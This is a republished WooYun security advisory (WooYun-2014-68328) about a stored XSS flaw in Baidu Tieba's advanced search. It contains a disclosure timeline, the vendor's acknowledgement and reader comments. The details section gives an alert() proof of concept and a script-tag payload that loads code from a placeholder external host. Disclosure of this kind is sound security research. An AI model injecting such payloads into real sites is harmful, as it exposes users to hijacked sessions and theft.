百度贴吧某处存储型XSS

2015年4月27日22:05:39评论344 views字数 208阅读0分41秒阅读模式

摘要

2014-07-13：细节已通知厂商并且等待厂商处理中
2014-07-13：厂商已经确认，细节仅向厂商公开
2014-07-23：细节向核心白帽子及相关领域专家公开
2014-08-02：细节向普通白帽子公开
2014-08-12：细节向实习白帽子公开
2014-08-27：细节向公众公开

漏洞概要关注数(9) 关注此漏洞

缺陷编号： WooYun-2014-68328

漏洞标题：百度贴吧某处存储型XSS

漏洞作者： 233

提交时间： 2014-07-13 12:34

公开时间： 2014-08-27 12:36

漏洞类型：网络设计缺陷/逻辑错误

危害等级：中

自评Rank： 6

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：设计缺陷/边界绕过存储型XSS

0人收藏

漏洞详情

披露状态：

简要描述：

百度贴吧某处存储型XSS

详细说明：

1.发表一个帖子

code 区域

<script>alert(/xss/)</script>

2.进入高级搜索搜索此人发言

3.触发XSS

由于标题字符限制

可以构建

code 区域

<script src="//xxx.com">

漏洞证明：

修复方案：

过滤

版权声明：转载请注明来源 233@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2014-07-13 15:09

厂商回复：

感谢对百度安全的关注与贡献，欢迎继续提交百度安全问题

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-07-13 17:13 | 小怿 ( 实习白帽子 | Rank:31 漏洞数:7 | )

0

是高级搜索的那个吗？

1# 回复此人
2014-07-13 19:18 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

0

@小怿是

2# 回复此人
2014-07-14 11:54 | X叶子 ( 路人 | 还没有发布任何漏洞 | 还要介绍？)

0

比我快10分钟

3# 回复此人
2014-08-12 23:22 | q601333824 ( 普通白帽子 | Rank:277 漏洞数:58 | 出自《狐妖小红娘》---自古人妖生死恋，千...)

0

666666

4# 回复此人
2015-04-26 15:26 | 昌维 ( 路人 | Rank:15 漏洞数:4 | QQ：867597730，百度贴吧ID：昌维001 个人...)

0

@q601333824 输入的时候为什么不是直接过滤然后进数据库？难道是数据原封不动进数据库，然后输出的时候再过滤？

5# 回复此人

漏洞概要 关注数(9) 关注此漏洞

缺陷编号： WooYun-2014-68328

漏洞标题： 百度贴吧某处存储型XSS

相关厂商： 百度